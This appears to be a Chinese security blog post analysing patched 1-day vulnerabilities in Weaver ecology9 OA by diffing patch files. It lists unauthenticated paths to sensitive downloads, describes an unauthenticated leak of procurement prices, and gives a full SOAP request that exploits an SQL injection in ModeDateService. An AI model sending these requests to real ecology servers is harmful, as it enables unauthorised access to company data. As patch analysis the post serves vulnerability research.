泛微ecology9 1day分析
泛微ecology9 1day分析
安全绘景 2024-12-18 07:18
0x01 前言
挺久没发文了,这段时间也忙,然后也是不知道写什么,发下看泛微的时候记的部分笔记吧,水水,冒个泡证明还在。
0x02 分析
下载补丁包,根据官方更新的时间,编写脚本筛选对应时间的补丁文件
。
可结合安全通告进一步确定漏洞类型。
脚本代码:
import os
import argparse
from datetime import datetime
def find_files_by_modification_date(folder_path, target_date):
files = []
for root, dirs, filenames in os.walk(folder_path):
for filename in filenames:
file_path = os.path.join(root, filename)
modification_time = os.path.getmtime(file_path)
modification_date = datetime.fromtimestamp(modification_time).date()
if modification_date == target_date:
files.append(file_path)
return files
def main():
parser = argparse.ArgumentParser(description="按修改日期查找文件。")
parser.add_argument("folder_path", type=str, help="要搜索的文件夹路径")
parser.add_argument("target_date", type=str, help="目标修改日期,格式为 YYYY-MM-DD")
args = parser.parse_args()
folder_path = args.folder_path
target_date = datetime.strptime(args.target_date, "%Y-%m-%d").date()
files = find_files_by_modification_date(folder_path, target_date)
for file in files:
print(file)
if __name__ == "__main__":
main()
随便挑几个日期的看看。
0816
上图,可以看到更新了几个文件,打开发现内容为error。
在未打补丁机器访问:
/cloudstore/ecode/setup/ecology_dev.zip
/integration/weaversso/summary_cfg/ecology_sso_guide.zip
/integration/weaversso/summary_cfg/ecology_sso_guide_en.zip
/integration/weaversso/summary_dev/ecology_sso_dev_guide.zip
/integration/weaversso/summary_dev/ecology_sso_dev_guide_en.zip
0815
官方通告中提到敏感信息泄露与越权登录漏洞。
根据脚本的输出,搜索SecurityRuelForCpt。
这里只分析信息泄露。未做鉴权,可根据资产id查出公司采购的商品及价格。
0715
这里只看ModeDateService吧,WorkPlanService网上挺多的了。
搜索ModeDateServiceXmlRule,跟进vaildate方法。
可以看到进一步过滤的方法,随便看一个。
很明显,拼接参数三。
最终的sql语句大概是这个样子:
select id from main_table t1,share_table t2 where 1=1 and t1.id = t2.sourceid and 1 = 1
1=1 为我们拼接的内容。
POST /services/ModeDateService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx//services/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ecology_JSessionid=aaasJ-HspHcxI5r2Krufz; JSESSIONID=aaasJ-HspHcxI5r2Krufz
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: xxx
Content-Length: 405
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mod="http://localhost/services/ModeDateService">
<soapenv:Header/>
<soapenv:Body>
<mod:getAllModeDataCount>
<mod:in0>1</mod:in0>
<mod:in1>1</mod:in1>
<mod:in2>1=1</mod:in2>
<mod:in3>1</mod:in3>
</mod:getAllModeDataCount>
</soapenv:Body>
</soapenv:Envelope>
0806
笔记就发这一点吧,xdm可以看看。
0x03 小密圈
最后送你一张优惠券,欢迎加入小密圈,好朋友。
报考安全证书也欢迎滴滴。